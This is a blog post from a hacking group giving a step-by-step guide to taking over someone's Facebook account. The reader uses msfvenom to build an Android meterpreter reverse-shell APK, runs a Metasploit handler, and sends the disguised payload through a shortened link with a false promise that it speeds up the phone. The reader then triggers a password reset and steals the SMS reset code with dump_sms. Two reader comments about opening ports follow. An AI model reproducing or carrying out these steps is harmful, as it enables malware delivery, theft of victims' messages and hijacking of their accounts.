add

Tuesday, 22 September 2015

Hacking facebook account via android exploitation



Greeting people ,

BL4CK|Phoenix hacking squad.  brought you a simple way of hacking facebook account with some real technique using meterpreter reverse shell through msfconsole . This is just not exploiting facebook but exploiting victim android phone to hack his facebook account .
Hack Account
exploit victim phone

  
                           
















let's start with following steps


--> Fire up Kali linux

--> Open terminal and start metasploit and postresql services

command --> # service metasploit start $$ service postgresql start



--> open port 4444 or any other to host your public ip from your router (note your linux firewall is not blocking the port)

--> check your port is open or not

to check type command in terminal

command --> # nc -lvp 4444(port number) note port 4444 is an  example

if port is listening then

go to http://www.yougetsignal.com/tools/open-ports/

type port number and hit check button if it is open you will get



sessions in terminal .


--> Now make meterpreter reverse shell(payload)for android device

type following command in terminal

command --> # msfvenom -p android/meterpreter/reverse_tcp
                          Lhost=(your external ip ) LPORT=(port no) R> name.apk


--> now open msfconsole by typing command --> # msfconsole 


it will take bit of time to open


once it open's follow the command


msf > use multi/handler hit enter


msf exploit(handler) > set payload android/meterpreter/reverse_tcp


this will set payload

msf exploit(handler) > set lhost (your internal ip)
this will set lhost

msf exploit(handler) > set lport (port no)

this will set lport 


msf exploit(handler) > exploit this will start the msf handler 







--> now tricky part comes upload the name.apk to any file sharing

site for example http://zippyshare.com/ or any other and shrink

the url with http://tinyurl.com/ or any other .

--> now send this link to victim on facebook to download payload

say him any thing it will speed up your phone etc.

--> once the victim install's the name.apk(payload) the handler will

start sessions 


--> now quickly go to facebook login and click forget password and

type victim's username and click search, once you got victim's

profile choose his phone number to reset password .

--> once you are done with it wait for 5-6 secs

--> now go to terminal and type command

--> command > dump_sms
--> once your fetched the sms 
 

--> open sms log txt file and get the victim facebook reset code and 



reset the victim facebook account password .


You have to be very fast before victim could understand what is happening

The more faster you are , the more successful you are


|EXPECT THE PHOENIX|

                               -Bit'z Ap'urv




                                                         Watch the video tutorial





 
 



                  
















Posted by at

2 comments:

  1. Unknown30 September 2015 at 23:57

    how to open port im getting port is closed for my ip address pls help me with that

    ReplyDelete
    Replies
    1. Unknown10 October 2015 at 02:06

      You have to open port from your router and note that your firewall is not blocking that port

      Delete

Subscribe to: Post Comments (Atom)